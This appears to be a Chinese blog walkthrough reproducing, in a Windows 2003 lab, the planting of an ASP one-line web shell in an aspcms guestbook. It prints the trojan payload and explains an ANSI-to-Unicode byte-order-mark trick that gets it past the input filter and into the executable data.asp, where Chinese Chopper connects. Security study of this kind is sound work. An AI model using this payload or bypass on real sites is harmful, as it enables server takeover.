WEB攻防-ASP安全-ASP后门植入连接

windows2003环境搭建,可参考上一篇WEB攻防-ASP安全-MDB下载-CSDN博客

将aspcms解压到C:\inetpub\wwwroot,创建网站并赋予internet来宾用户权限

配置启用父路径和主页指向

上一篇文章提到,数据库文件后缀为asp、asa会被执行解析,所以当进行访问时,会直接以asp的形式进行执行

根据这个思路,尝试去插入一句话木马

提交后文本被过滤了,所以菜刀无法连接,需要使用其他方法绕过过滤

这里使用ANSI转Unicode的方法

参考文献:ANSI与Unicode互转 - ANSI编码的一句话以Unicode方式显示-CSDN博客

创建一个文本文件,输入一句话木马<% execute request("aaa")%>b,然后另存为ANSI编码

使用winhex打开刚创建的文本文件,将光标定位到首位,选择编辑-->粘贴0字节,添加2个字节

将添加的两个字节改为FFFE, 保存再打开该文件,就完成了转码

┼攠數畣整爠煥敵瑳∨慡≡┩戾

将转码后的乱发写入到留言里

成功插入数据到data.asp中

由于是复现,我们直接查看data.asp

记事本打开data.asp可以直接看到插入的木马

根据asp被执行的特性,就可以使用菜刀执行连接了

相关推荐
复园电子8 小时前
企业级PDF批量盖章方案选型指南
数据库·pdf
AI-好学者15 小时前
阶段一-图数据库基础与PropertyGraph模型
数据库·rag·knowledge graph·graphrag
其实防守也摸鱼16 小时前
运维--学习阶段问题解答(1)(自测)
linux·运维·服务器·数据库·学习·自动化·命令模式
懒鸟一枚16 小时前
深入理解 Linux 内存、Swap 交换分区与分页机制的关系
java·linux·数据库
龙仔72516 小时前
SQL Server 创建只读账号完整操作(分两种场景:SSMS图形界面 + T-SQL脚本)
数据库·sql·oracle
霁月的小屋17 小时前
生产环境中的事务实践——银行系统上线记(四)
数据库
Database_Cool_17 小时前
AI 应用数据底座首选:阿里云 PolarDB 为大模型 RAG 提供一体化支撑
数据库·阿里云
玖玥拾17 小时前
C# 语言进阶(十五)C# 游戏服务端 MySQL 数据库
服务器·开发语言·网络·数据库·mysql·c#
零零信安18 小时前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
IvorySQL19 小时前
PG 日报|社区讨论重构 pg_hba 配置文件格式
数据库·人工智能·postgresql·重构·ivorysql